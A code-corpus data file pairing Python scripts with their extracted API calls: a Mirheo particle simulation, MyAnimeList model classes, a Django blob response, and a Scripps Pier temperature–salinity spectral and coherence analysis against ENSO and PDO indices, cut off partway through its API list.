'tensor2tensor.trax.layers.LogSoftmax', 'layers.LogSoftmax', ([], {}), '()\n', (3490, 3492), False, 'from tensor2tensor.trax import layers\n'), ((3514, 3529), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', (['(1)'], {}), '(1)\n', (3526, 3529), False, 'from tensor2tensor.trax import layers\n'), ((8363, 8395), 'numpy.ones_like', 'onp.ones_like', (['r'], {'dtype': 'np.int32'}), '(r, dtype=np.int32)\n', (8376, 8395), True, 'import numpy as onp\n'), ((15573, 15585), 'jax.numpy.arange', 'np.arange', (['B'], {}), '(B)\n', (15582, 15585), True, 'from jax import numpy as np\n'), ((29289, 29358), 'absl.logging.info', 'logging.info', (['"""Epoch [% 6d] Policy Evaluation [%s] = %10.2f"""', 'i', 'k', 'v'], {}), "('Epoch [% 6d] Policy Evaluation [%s] = %10.2f', i, k, v)\n", (29301, 29358), False, 'from absl import logging\n'), ((30181, 30196), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (30187, 30196), True, 'from jax import numpy as np\n'), ((30237, 30252), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (30243, 30252), True, 'from jax import numpy as np\n'), ((35197, 35318), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Early stopping policy and value optimization at iter: %d, with approx_kl: %0.2f"""', 'j', 'approx_kl'], {}), "(1,\n 'Early stopping policy and value optimization at iter: %d, with approx_kl: %0.2f'\n , j, approx_kl)\n", (35209, 35318), False, 'from absl import logging\n'), ((36302, 36484), 'absl.logging.vlog', 'logging.vlog', (['(1)', '"""Combined Loss(value, ppo, entropy_bonus) [%10.2f] -> [%10.2f(%10.2f,%10.2f,%10.2f)]"""', 'cur_combined_loss', 'loss_combined', 'loss_value', 'loss_ppo', 'entropy_bonus'], {}), "(1,\n 'Combined Loss(value, ppo, entropy_bonus) [%10.2f] -> [%10.2f(%10.2f,%10.2f,%10.2f)]'\n , cur_combined_loss, loss_combined, loss_value, loss_ppo, entropy_bonus)\n", (36314, 36484), False, 'from absl import logging\n'), ((36741, 36766), 'jax.numpy.abs', 'np.abs', (['cur_combined_loss'], {}), '(cur_combined_loss)\n', (36747, 36766), True, 'from jax import numpy as np\n'), ((37417, 37447), 'tensorflow.io.gfile.GFile', 'gfile.GFile', (['params_file', '"""wb"""'], {}), "(params_file, 'wb')\n", (37428, 37447), False, 'from tensorflow.io import gfile\n'), ((37462, 37505), 'pickle.dump', 'pickle.dump', (['policy_and_value_net_params', 'f'], {}), '(policy_and_value_net_params, f)\n', (37473, 37505), False, 'import pickle\n'), ((3226, 3241), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', (['(1)'], {}), '(1)\n', (3238, 3241), False, 'from tensor2tensor.trax import layers\n'), ((30489, 30504), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (30495, 30504), True, 'from jax import numpy as np\n'), ((3165, 3190), 'tensor2tensor.trax.layers.Dense', 'layers.Dense', (['num_actions'], {}), '(num_actions)\n', (3177, 3190), False, 'from tensor2tensor.trax import layers\n'), ((3192, 3211), 'tensor2tensor.trax.layers.LogSoftmax', 'layers.LogSoftmax', ([], {}), '()\n', (3209, 3211), False, 'from tensor2tensor.trax import layers\n'), ((24618, 24633), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (24624, 24633), True, 'from jax import numpy as np\n'), ((30111, 30126), 'jax.numpy.sum', 'np.sum', (['traj[2]'], {}), '(traj[2])\n', (30117, 30126), True, 'from jax import numpy as np\n')] |
#!/usr/bin/env python
import mirheo as mir
dt = 0.001
ranks = (1, 1, 1)
domain = (8, 16, 8)
force = (1.0, 0, 0)
density = 4
u = mir.Mirheo(ranks, domain, dt, debug_level=3, log_filename='log', no_splash=True)
pv = mir.ParticleVectors.ParticleVector('pv', mass = 1)
ic = mir.InitialConditions.Uniform(number_density=density)
u.registerParticleVector(pv=pv, ic=ic)
dpd = mir.Interactions.Pairwise('dpd', rc=1.0, kind="DPD", a=10.0, gamma=50.0, kBT=1.0, power=0.5)
u.registerInteraction(dpd)
plate_lo = mir.Walls.Plane("plate_lo", (0, 0, -1), (0, 0, 1))
plate_hi = mir.Walls.Plane("plate_hi", (0, 0, 1), (0, 0, domain[2] - 1))
u.registerWall(plate_lo, 0)
u.registerWall(plate_hi, 0)
vv = mir.Integrators.VelocityVerlet("vv")
frozen = u.makeFrozenWallParticles(pvName="plates", walls=[plate_lo, plate_hi], interactions=[dpd], integrator=vv, number_density=density)
u.setWall(plate_lo, pv)
u.setWall(plate_hi, pv)
for p in (pv, frozen):
u.setInteraction(dpd, p, pv)
vv_dp = mir.Integrators.VelocityVerlet_withConstForce("vv_dp", force)
u.registerIntegrator(vv_dp)
u.setIntegrator(vv_dp, pv)
sample_every = 2
dump_every = 1000
bin_size = (1., 1., 0.5)
u.registerPlugins(mir.Plugins.createDumpAverage('field', [pv], sample_every, dump_every, bin_size, ["velocities"], 'h5/solvent-'))
u.run(7002)
# nTEST: walls.analytic.plates
# cd walls/analytic
# rm -rf h5
# mir.run --runargs "-n 2" ./plates.py
# mir.avgh5 xy velocities h5/solvent-0000[4-7].h5 | awk '{print $1}' > profile.out.txt
| [
"mirheo.Interactions.Pairwise",
"mirheo.Mirheo",
"mirheo.Walls.Plane",
"mirheo.ParticleVectors.ParticleVector",
"mirheo.Integrators.VelocityVerlet",
"mirheo.Plugins.createDumpAverage",
"mirheo.InitialConditions.Uniform",
"mirheo.Integrators.VelocityVerlet_withConstForce"
]
| [((134, 219), 'mirheo.Mirheo', 'mir.Mirheo', (['ranks', 'domain', 'dt'], {'debug_level': '(3)', 'log_filename': '"""log"""', 'no_splash': '(True)'}), "(ranks, domain, dt, debug_level=3, log_filename='log', no_splash=True\n )\n", (144, 219), True, 'import mirheo as mir\n'), ((221, 269), 'mirheo.ParticleVectors.ParticleVector', 'mir.ParticleVectors.ParticleVector', (['"""pv"""'], {'mass': '(1)'}), "('pv', mass=1)\n", (255, 269), True, 'import mirheo as mir\n'), ((277, 330), 'mirheo.InitialConditions.Uniform', 'mir.InitialConditions.Uniform', ([], {'number_density': 'density'}), '(number_density=density)\n', (306, 330), True, 'import mirheo as mir\n'), ((381, 477), 'mirheo.Interactions.Pairwise', 'mir.Interactions.Pairwise', (['"""dpd"""'], {'rc': '(1.0)', 'kind': '"""DPD"""', 'a': '(10.0)', 'gamma': '(50.0)', 'kBT': '(1.0)', 'power': '(0.5)'}), "('dpd', rc=1.0, kind='DPD', a=10.0, gamma=50.0,\n kBT=1.0, power=0.5)\n", (406, 477), True, 'import mirheo as mir\n'), ((513, 563), 'mirheo.Walls.Plane', 'mir.Walls.Plane', (['"""plate_lo"""', '(0, 0, -1)', '(0, 0, 1)'], {}), "('plate_lo', (0, 0, -1), (0, 0, 1))\n", (528, 563), True, 'import mirheo as mir\n'), ((588, 649), 'mirheo.Walls.Plane', 'mir.Walls.Plane', (['"""plate_hi"""', '(0, 0, 1)', '(0, 0, domain[2] - 1)'], {}), "('plate_hi', (0, 0, 1), (0, 0, domain[2] - 1))\n", (603, 649), True, 'import mirheo as mir\n'), ((714, 750), 'mirheo.Integrators.VelocityVerlet', 'mir.Integrators.VelocityVerlet', (['"""vv"""'], {}), "('vv')\n", (744, 750), True, 'import mirheo as mir\n'), ((1006, 1067), 'mirheo.Integrators.VelocityVerlet_withConstForce', 'mir.Integrators.VelocityVerlet_withConstForce', (['"""vv_dp"""', 'force'], {}), "('vv_dp', force)\n", (1051, 1067), True, 'import mirheo as mir\n'), ((1210, 1325), 'mirheo.Plugins.createDumpAverage', 'mir.Plugins.createDumpAverage', (['"""field"""', '[pv]', 'sample_every', 'dump_every', 'bin_size', "['velocities']", '"""h5/solvent-"""'], {}), "('field', [pv], sample_every, dump_every,\n bin_size, ['velocities'], 'h5/solvent-')\n", (1239, 1325), True, 'import mirheo as mir\n')] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import abc
import bs4
import functools
import utilities
class Error(Exception):
"""Base exception class that takes a message to display upon raising.
"""
def __init__(self, message=None):
"""Creates an instance of Error.
:type message: str
:param message: A message to display when raising the exception.
"""
super(Error, self).__init__()
self.message = message
def __str__(self):
return unicode(self.message) if self.message is not None else u""
class MalformedPageError(Error):
"""Indicates that a page on MAL has broken markup in some way.
"""
def __init__(self, id, html, message=None):
super(MalformedPageError, self).__init__(message=message)
if isinstance(id, unicode):
self.id = id
else:
self.id = str(id).decode(u'utf-8')
if isinstance(html, unicode):
self.html = html
else:
self.html = str(html).decode(u'utf-8')
def __str__(self):
return "\n".join([
super(MalformedPageError, self).__str__(),
"ID: " + self.id,
"HTML: " + self.html
]).encode(u'utf-8')
class InvalidBaseError(Error):
"""Indicates that the particular resource instance requested does not exist on MAL.
"""
def __init__(self, id, message=None):
super(InvalidBaseError, self).__init__(message=message)
self.id = id
def __str__(self):
return "\n".join([
super(InvalidBaseError, self).__str__(),
"ID: " + unicode(self.id)
])
def loadable(func_name):
"""Decorator for getters that require a load() upon first access.
:type func_name: function
:param func_name: class method that requires that load() be called if the class's _attribute value is None
:rtype: function
:return: the decorated class method.
"""
def inner(func):
cached_name = '_' + func.__name__
@functools.wraps(func)
def _decorator(self, *args, **kwargs):
if getattr(self, cached_name) is None:
getattr(self, func_name)()
return func(self, *args, **kwargs)
return _decorator
return inner
class Base(object):
"""Abstract base class for MAL resources. Provides autoloading, auto-setting functionality for other MAL objects.
"""
__metaclass__ = abc.ABCMeta
"""Attribute name for primary reference key to this object.
When an attribute by the name given by _id_attribute is passed into set(), set() doesn't prepend an underscore for load()ing.
"""
_id_attribute = "id"
def __repr__(self):
return u"".join([
"<",
self.__class__.__name__,
" ",
self._id_attribute,
": ",
unicode(getattr(self, self._id_attribute)),
">"
])
def __hash__(self):
return hash('-'.join([self.__class__.__name__, unicode(getattr(self, self._id_attribute))]))
def __eq__(self, other):
return isinstance(other, self.__class__) and getattr(self, self._id_attribute) == getattr(other, other._id_attribute)
def __ne__(self, other):
return not self.__eq__(other)
def __init__(self, session):
"""Create an instance of Base.
:type session: :class:`myanimelist.session.Session`
:param session: A valid MAL session.
"""
self.session = session
@abc.abstractmethod
def load(self):
"""A callback to run before any @loadable attributes are returned.
"""
pass
def set(self, attr_dict):
"""Sets attributes of this user object.
:type attr_dict: dict
:param attr_dict: Parameters to set, with attribute keys.
:rtype: :class:`.Base`
:return: The current object.
"""
for key in attr_dict:
if key == self._id_attribute:
setattr(self, self._id_attribute, attr_dict[key])
else:
setattr(self, u"_" + key, attr_dict[key])
return self | [
"functools.wraps"
]
| [((1855, 1876), 'functools.wraps', 'functools.wraps', (['func'], {}), '(func)\n', (1870, 1876), False, 'import functools\n')] |
"""p2 core http responses"""
from wsgiref.util import FileWrapper
from django.http import StreamingHttpResponse
from p2.core.constants import ATTR_BLOB_MIME, ATTR_BLOB_SIZE_BYTES
from p2.core.models import Blob
class BlobResponse(StreamingHttpResponse):
"""Directly return blob's content. Optionally return as attachment if as_download is True"""
def __init__(self, blob: Blob, chunk_size=8192):
super().__init__(FileWrapper(blob, chunk_size))
self['Content-Length'] = blob.attributes.get(ATTR_BLOB_SIZE_BYTES, 0)
self['Content-Type'] = blob.attributes.get(ATTR_BLOB_MIME, 'text/plain')
| [
"wsgiref.util.FileWrapper"
]
| [((434, 463), 'wsgiref.util.FileWrapper', 'FileWrapper', (['blob', 'chunk_size'], {}), '(blob, chunk_size)\n', (445, 463), False, 'from wsgiref.util import FileWrapper\n')] |
"""
Data: Temperature and Salinity time series from SIO Scripps Pier
Salinity: measured in PSU at the surface (~0.5m) and at depth (~5m)
Temp: measured in degrees C at the surface (~0.5m) and at depth (~5m)
- Timestamp included beginning in 1990
"""
# imports
import sys,os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import datetime
from scipy import signal
import scipy.stats as ss
import SIO_modules as SIO_mod
from importlib import reload
reload(SIO_mod)
# read in temp and sal files
sal_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt', sep='\t', skiprows = 27)
temp_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt', sep='\t', skiprows = 26)
ENSO_data = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx')
ENSO_data_recent = pd.read_excel('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx')
PDO_data = pd.read_csv('/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv', skiprows = 1)
path_out = '/Users/MMStoll/Python/Output/Ocean569_Output/SIO_Output/'
# convert year, month, day columns to single DATE column
sal_data['DATE'] = pd.to_datetime(sal_data[['YEAR', 'MONTH', 'DAY']])
temp_data['DATE'] = pd.to_datetime(temp_data[['YEAR', 'MONTH', 'DAY']])
ENSO_data_all = ENSO_data.append(ENSO_data_recent[323:], ignore_index = True)
PDO_data['DATE'] = pd.to_datetime(PDO_data['Date'], format='%Y%m')
# remove uncertain data(SURF_FLAG between 1 and 4), replace with NaN, then interpolate
for i in range(0,len(sal_data['SURF_SAL_PSU'])):
if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4):
sal_data['SURF_SAL_PSU'][i] = np.nan
for i in range(0,len(temp_data['SURF_TEMP_C'])):
if (sal_data['SURF_FLAG'][i] >= 1) and (sal_data['SURF_FLAG'][i] <=4):
sal_data['SURF_SAL_PSU'][i] = np.nan
# interpolate missing temp and sal data
sal_data['SURF_SAL_PSU'] = sal_data['SURF_SAL_PSU'].interpolate()
temp_data['SURF_TEMP_C'] = temp_data['SURF_TEMP_C'].interpolate()
sal_data['SURF_SAL_PSU'][0] = sal_data['SURF_SAL_PSU'][1]
# remove the average from the sal and temp data and create new columns
sal_data['SURF_SAL_PSU_NOAVG'] = sal_data['SURF_SAL_PSU'] - sal_data['SURF_SAL_PSU'].mean()
temp_data['SURF_TEMP_C_NOAVG'] = temp_data['SURF_TEMP_C'] - temp_data['SURF_TEMP_C'].mean()
# remove trends from the sal and temp data and create new columns
sal_fit = np.polyfit(sal_data.index,sal_data['SURF_SAL_PSU_NOAVG'],1)
sal_fit_fn = np.poly1d(sal_fit)
temp_fit = np.polyfit(temp_data.index,temp_data['SURF_TEMP_C_NOAVG'],1)
temp_fit_fn = np.poly1d(temp_fit)
sal_fit_value = sal_fit_fn(sal_data.index)
temp_fit_value = temp_fit_fn(temp_data.index)
sal_data['SURF_SAL_PSU_DETREND'] = sal_data['SURF_SAL_PSU_NOAVG'] - sal_fit_value
temp_data['SURF_TEMP_C_DETREND'] = temp_data['SURF_TEMP_C_NOAVG'] - temp_fit_value
sal_tri = sal_data['SURF_SAL_PSU_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean()
temp_tri = temp_data['SURF_TEMP_C_DETREND'].rolling(center = True, window = 30, min_periods = 3, win_type = 'triang').mean()
# # 1. FFT the SIO Data
# t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_data['SURF_TEMP_C_DETREND'])
# # 2. Apply butterworth filter to SIO data, with cutoff equal to nyquist freq of enso index
# fs = 1 # sampling frequency, once per day
# fc = 1/60 # cut-off frequency of the filter (cut off periods shorter than 60 days)
# w = fc / (fs / 2) #normalize the frequency
# b, a = signal.butter(4, w, 'low')
# temp_output = signal.filtfilt(b, a, t_spec)
# # 3. Inverse FFT of filtered SIO data
# temp_ifft = np.fft.irfft(temp_output,n=len(temp_output))
# # 4. Subsample new SIO time series with same delta t as ENSO index (once per month)
# temp_ifft_sampled = np.mean(temp_ifft[0:18750].reshape(-1, 30), axis=1)
# temp_ifft_len = temp_ifft_sampled[0:618]
# x = np.linspace(0,18770, 18770)
# plt.figure()
# plt.loglog(x, temp_ifft)
# plt.show()
# butterworth low pass filter for temperature and salinity
fs = 1 # sampling frequency, once per day
fc = 1/500 # cut-off frequency of the filter (cut off periods shorter than 500 days)
w = fc / (fs / 2) #normalize the frequency
b, a = signal.butter(4, w, 'low')
temp_output = signal.filtfilt(b, a, temp_tri)
sal_output = signal.filtfilt(b, a, sal_tri)
temp_sampled = np.mean(temp_output[0:37530].reshape(-1, 30), axis=1) #length = 1251
# create dataframe with spectra for each variable
spectra_temp_df = pd.DataFrame(columns = ['Temp_freq', 'Temp_spec', 'Temp_fft'])
spectra_sal_df = pd.DataFrame(columns = ['Sal_freq', 'Sal_spec', 'Sal_fft'])
spectra_PDO_df = pd.DataFrame(columns = ['PDO_freq', 'PDO_spec', 'PDO_fft'])
spectra_ENSO_df = pd.DataFrame(columns = ['ENSO_freq', 'ENSO_spec', 'ENSO_fft'])
# for coherence, start all records at 1916-01-01
# ENSO data [20:] 1916-09-01 onward, monthly// ends now, through 2019-05-01 [:1254]
# Temp data [10:] 1916-09-01 onward, daily // ends 2019-05-31
# PDO data [752:] 1916-09-01 onward, monthly// ends now, thorugh 2019-05-01 [:1985]
# compute spectral variables for each variable
for j in range(0,4):
data_sets = [temp_sampled, sal_data['SURF_SAL_PSU_DETREND'], PDO_data['Value'][743:], ENSO_data_all['VALUE'][14:]]
freq, spec, spec_amp, fft, delt, freq_T, freq_nyquist = SIO_mod.var_fft(data_sets[j])
if j == 0:
spectra_temp_df['Temp_freq'] = freq
spectra_temp_df['Temp_spec'] = spec
spectra_temp_df['Temp_fft'] = fft
if j == 1:
spectra_sal_df['Sal_freq'] = freq
spectra_sal_df['Sal_spec'] = spec
spectra_sal_df['Sal_fft'] = fft
if j == 2:
spectra_PDO_df['PDO_freq'] = freq
spectra_PDO_df['PDO_spec'] = spec
spectra_PDO_df['PDO_fft'] = fft
if j == 3:
spectra_ENSO_df['ENSO_freq'] = freq
spectra_ENSO_df['ENSO_spec'] = spec
spectra_ENSO_df['ENSO_fft'] = fft
def band_average(fft_var1,fft_var2,frequency,n_av):
# fft_var1 and fft_var2 are the inputs computed via fft
# they can be the same variable or different variables
# n_av is the number of bands to be used for smoothing (nice if it is an odd number)
# this function is limnited to 100,000 points but can easily be modified
nmax=100000
# T_length = (len(fft_var1) * 2 - 2)
# define some variables and arrays
n_spec=len(fft_var1)
n_av2=int(n_av//2+1) #number of band averages/2 + 1
spec_amp_av=np.zeros(nmax)
spec_phase_av=np.zeros(nmax)
freq_av=np.zeros(nmax)
# average the lowest frequency bands first (with half as many points in the average)
sum_low_amp=0.
sum_low_phase=0.
count=0
spectrum_amp=np.absolute(fft_var1*np.conj(fft_var2))#/(2.*np.pi*T_length*delt)
spectrum_phase=np.angle(fft_var1*np.conj(fft_var2),deg=True) #/(2.*np.pi*T_length*delt) don't know if I need the 2pi/Tdeltt here...
#
for i in range(0,n_av2):
sum_low_amp+=spectrum_amp[i]
sum_low_phase+=spectrum_phase[i]
spec_amp_av[0]=sum_low_amp/n_av2
spec_phase_av[0]=sum_low_phase/n_av
# compute the rest of the averages
for i in range(n_av2,n_spec-n_av,n_av):
count+=1
spec_amp_est=np.mean(spectrum_amp[i:i+n_av])
spec_phase_est=np.mean(spectrum_phase[i:i+n_av])
freq_est=frequency[i+n_av//2]
spec_amp_av[count]=spec_amp_est
spec_phase_av[count]=spec_phase_est
freq_av[count]=freq_est
# omega0 = 2.*np.pi/(T_length*delt)
# contract the arrays
spec_amp_av=spec_amp_av[0:count]
spec_phase_av=spec_phase_av[0:count]
freq_av=freq_av[0:count]
return spec_amp_av,spec_phase_av,freq_av,count
n_av = 5
# define terms to compute coherence between temp and ENSO
t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals
t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av)
e_spec_b,e_phase_b,e_freq_av_b,count=band_average(spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_fft'],spectra_ENSO_df['ENSO_freq'],n_av)
e_fft_star = np.conj(spectra_ENSO_df['ENSO_fft'])
cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,e_fft_star,spectra_ENSO_df['ENSO_freq'],n_av)
coh_sq2=cospec_amp2**2/(t_spec_b*e_spec_b)
# define colors
t_color = 'cadetblue'
s_color = 'darkslateblue'
p_color = 'seagreen'
e_color = 'steelblue'
freq_ann = 2*np.pi/365.25
# plot the coherence and phase between ENSO and temperature
tstr = 'SIO Temperature and ENSO Index \nCoherence and Phase'
im_name = 'SIO_TempENSO_CoherencePhase.jpg'
NR = 2; NC = 1
fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7))
axes[0].semilogx(freq_av2,coh_sq2, color = e_color)
axes[0].set_xlabel('$\omega$ (radians/day)')
axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{ENSO}$')
axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes)
axes[1].semilogx(freq_av2, cospec_phase2, color = e_color)
axes[1].set_xlabel('$\omega$ (radians/day)')
axes[1].set_ylabel('Phase $\it{T}$-$\it{ENSO}$, degrees')
axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes)
axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes)
fig.suptitle(tstr)
# fig.tight_layout(pad=2.0)
plt.savefig(path_out + im_name)
plt.show()
n_av = 5
# define terms to compute coherence between temp and ENSO
#t_freq,t_spec,t_spec_amp,t_fft,t_delt,t_freq_T,t_freq_nyquist = SIO_mod.var_fft(temp_sampled) #take fft/compute spectra of temp_sampled at 30 day intervals
#t_spec_b,t_phase_b,t_freq_av_b,count=band_average(t_fft,t_fft,t_freq,n_av)
p_spec_b,p_phase_b,p_freq_av_b,count=band_average(spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_fft'],spectra_PDO_df['PDO_freq'],n_av)
p_fft_star = np.conj(spectra_PDO_df['PDO_fft'])
cospec_amp2,cospec_phase2,freq_av2,count2=band_average(t_fft,p_fft_star,spectra_PDO_df['PDO_freq'],n_av)
coh_sq2=cospec_amp2**2/(t_spec_b*p_spec_b)
# plot the coherence and phase between ENSO and temperature
tstr = 'SIO Temperature and PDO Index \nCoherence and Phase'
im_name = 'SIO_TempPDO_CoherencePhase.jpg'
NR = 2; NC = 1
fig, axes = plt.subplots(nrows = NR,ncols=NC,figsize = (10,7))
axes[0].semilogx(freq_av2,coh_sq2, color = p_color)
axes[0].set_xlabel('$\omega$ (radians/day)')
axes[0].set_ylabel('Squared Coherence $\it{T}$-$\it{PDO}$')
axes[0].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.075, 0.1,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.00018, 0.1,'$\omega_o$', alpha = 0.5) #transform = ax.transAxes)
axes[0].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[0].text(0.0098, 0.1, 'Annual', alpha = 0.5)#transform = ax.transAxes)
axes[1].semilogx(freq_av2, cospec_phase2, color = p_color)
axes[1].set_xlabel('$\omega$ (radians/day)')
axes[1].set_ylabel('Phase $\it{T}$-$\it{PDO}$, degrees')
axes[1].axvline(t_freq_nyquist, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.075, -110,'$\omega_{max}$', alpha = 0.5) #transform = ax.transAxes)
axes[1].axvline(t_freq_T, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.00018, -110,'$\omega_o$', alpha = 0.5)#transform = ax.transAxes)
axes[1].axvline(freq_ann, color = 'black', linestyle = '--', alpha = 0.5)
axes[1].text(0.0098, -110, 'Annual', alpha = 0.5)#transform = ax.transAxes)
fig.suptitle(tstr)
# fig.tight_layout(pad=2.0)
plt.savefig(path_out + im_name)
plt.show()
| [
"numpy.mean",
"matplotlib.pyplot.savefig",
"SIO_modules.var_fft",
"pandas.read_csv",
"numpy.polyfit",
"scipy.signal.filtfilt",
"pandas.DataFrame",
"numpy.conj",
"scipy.signal.butter",
"numpy.zeros",
"importlib.reload",
"pandas.read_excel",
"numpy.poly1d",
"matplotlib.pyplot.subplots",
"pandas.to_datetime",
"matplotlib.pyplot.show"
]
| [((482, 497), 'importlib.reload', 'reload', (['SIO_mod'], {}), '(SIO_mod)\n', (488, 497), False, 'from importlib import reload\n'), ((539, 661), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt"""'], {'sep': '"""\t"""', 'skiprows': '(27)'}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_SALT_1916-201905.txt'\n , sep='\\t', skiprows=27)\n", (550, 661), True, 'import pandas as pd\n'), ((666, 788), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt"""'], {'sep': '"""\t"""', 'skiprows': '(26)'}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/SIO_TEMP_1916_201905.txt'\n , sep='\\t', skiprows=26)\n", (677, 788), True, 'import pandas as pd\n'), ((793, 884), 'pandas.read_excel', 'pd.read_excel', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx"""'], {}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_data.xlsx')\n", (806, 884), True, 'import pandas as pd\n'), ((899, 1002), 'pandas.read_excel', 'pd.read_excel', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx"""'], {}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_ENSO_recent_data.xlsx'\n )\n", (912, 1002), True, 'import pandas as pd\n'), ((1004, 1107), 'pandas.read_csv', 'pd.read_csv', (['"""/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv"""'], {'skiprows': '(1)'}), "(\n '/Users/MMStoll/Python/Data/Ocean569_Data/SIO_Data/NOAA_PDO_data.csv',\n skiprows=1)\n", (1015, 1107), True, 'import pandas as pd\n'), ((1248, 1298), 'pandas.to_datetime', 'pd.to_datetime', (["sal_data[['YEAR', 'MONTH', 'DAY']]"], {}), "(sal_data[['YEAR', 'MONTH', 'DAY']])\n", (1262, 1298), True, 'import pandas as pd\n'), ((1319, 1370), 'pandas.to_datetime', 'pd.to_datetime', (["temp_data[['YEAR', 'MONTH', 'DAY']]"], {}), "(temp_data[['YEAR', 'MONTH', 'DAY']])\n", (1333, 1370), True, 'import pandas as pd\n'), ((1468, 1515), 'pandas.to_datetime', 'pd.to_datetime', (["PDO_data['Date']"], {'format': '"""%Y%m"""'}), "(PDO_data['Date'], format='%Y%m')\n", (1482, 1515), True, 'import pandas as pd\n'), ((2490, 2551), 'numpy.polyfit', 'np.polyfit', (['sal_data.index', "sal_data['SURF_SAL_PSU_NOAVG']", '(1)'], {}), "(sal_data.index, sal_data['SURF_SAL_PSU_NOAVG'], 1)\n", (2500, 2551), True, 'import numpy as np\n'), ((2563, 2581), 'numpy.poly1d', 'np.poly1d', (['sal_fit'], {}), '(sal_fit)\n', (2572, 2581), True, 'import numpy as np\n'), ((2593, 2655), 'numpy.polyfit', 'np.polyfit', (['temp_data.index', "temp_data['SURF_TEMP_C_NOAVG']", '(1)'], {}), "(temp_data.index, temp_data['SURF_TEMP_C_NOAVG'], 1)\n", (2603, 2655), True, 'import numpy as np\n'), ((2668, 2687), 'numpy.poly1d', 'np.poly1d', (['temp_fit'], {}), '(temp_fit)\n', (2677, 2687), True, 'import numpy as np\n'), ((4317, 4343), 'scipy.signal.butter', 'signal.butter', (['(4)', 'w', '"""low"""'], {}), "(4, w, 'low')\n", (4330, 4343), False, 'from scipy import signal\n'), ((4358, 4389), 'scipy.signal.filtfilt', 'signal.filtfilt', (['b', 'a', 'temp_tri'], {}), '(b, a, temp_tri)\n', (4373, 4389), False, 'from scipy import signal\n'), ((4403, 4433), 'scipy.signal.filtfilt', 'signal.filtfilt', (['b', 'a', 'sal_tri'], {}), '(b, a, sal_tri)\n', (4418, 4433), False, 'from scipy import signal\n'), ((4589, 4649), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['Temp_freq', 'Temp_spec', 'Temp_fft']"}), "(columns=['Temp_freq', 'Temp_spec', 'Temp_fft'])\n", (4601, 4649), True, 'import pandas as pd\n'), ((4669, 4726), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': "['Sal_freq', 'Sal_spec', 'Sal_fft']"}), "(columns=['Sal_freq', 'Sal_spec', 'Sal_fft'])\n", (4681, 4726), True, 'import pandas as pd\n'), ((4746, 